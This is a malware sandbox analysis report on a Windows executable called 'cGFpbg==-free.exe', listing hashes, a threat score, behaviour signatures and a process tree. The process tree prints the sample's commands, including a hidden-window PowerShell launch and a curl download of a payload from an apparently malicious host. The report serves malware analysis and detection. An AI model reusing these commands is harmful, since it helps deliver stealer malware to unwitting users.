Analysis

  • max time kernel
    15s
  • max time network
    19s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-es
  • resource tags

    arch:x64arch:x86image:win10-20240404-eslocale:es-esos:windows10-1703-x64systemwindows
  • submitted
    09/10/2024, 04:24

General

  • Target

    cGFpbg==-free.exe

  • Size

    30.1MB

  • MD5

    d35067404c9da79a4828667a0cb1367d

  • SHA1

    4ea1d15525f270259536533cad90075808eddac9

  • SHA256

    f3ff39b5b8093603782cff77db81e596143e275e61b46e7174b9c31b0b1ba09d

  • SHA512

    8179eaf0bea0a0833d39055e1508c7e982c49b8a06097ad0aaaf7ea1ea67b5d187ffb807e272202fa52d87f18a61181995e03e5218f7517f0a2a84bd0117aae5

  • SSDEEP

    393216:tQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgM96l+ZArYsFRlt:t3on1HvSzxAMNMFZArYs1

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cGFpbg==-free.exe
    "C:\Users\Admin\AppData\Local\Temp\cGFpbg==-free.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:168
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1156
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl https://stealproyect.pw/api/get/free -o "C:\Users\Admin\AppData\Local\Temp\15wEusJ2.zip""
      2⤵
        PID:4584

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rbi04ug.jcb.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • memory/1156-6-0x00007FFCECE83000-0x00007FFCECE84000-memory.dmp

            Filesize

            4KB

          • memory/1156-8-0x00000261FAC00000-0x00000261FAC82000-memory.dmp

            Filesize

            520KB

          • memory/1156-9-0x00000261FAB70000-0x00000261FAB80000-memory.dmp

            Filesize

            64KB

          • memory/1156-10-0x00000261FABB0000-0x00000261FABD2000-memory.dmp

            Filesize

            136KB

          • memory/1156-11-0x00000261FAF10000-0x00000261FB012000-memory.dmp

            Filesize

            1.0MB

          • memory/1156-13-0x00007FFCECE80000-0x00007FFCED86C000-memory.dmp

            Filesize

            9.9MB

          • memory/1156-25-0x00007FFCECE80000-0x00007FFCED86C000-memory.dmp

            Filesize

            9.9MB

          • memory/1156-40-0x00000261FB4E0000-0x00000261FB51C000-memory.dmp

            Filesize

            240KB

          • memory/1156-51-0x00000261FB5A0000-0x00000261FB616000-memory.dmp

            Filesize

            472KB

          • memory/1156-61-0x00007FFCECE83000-0x00007FFCECE84000-memory.dmp

            Filesize

            4KB

          • memory/1156-62-0x00007FFCECE80000-0x00007FFCED86C000-memory.dmp

            Filesize

            9.9MB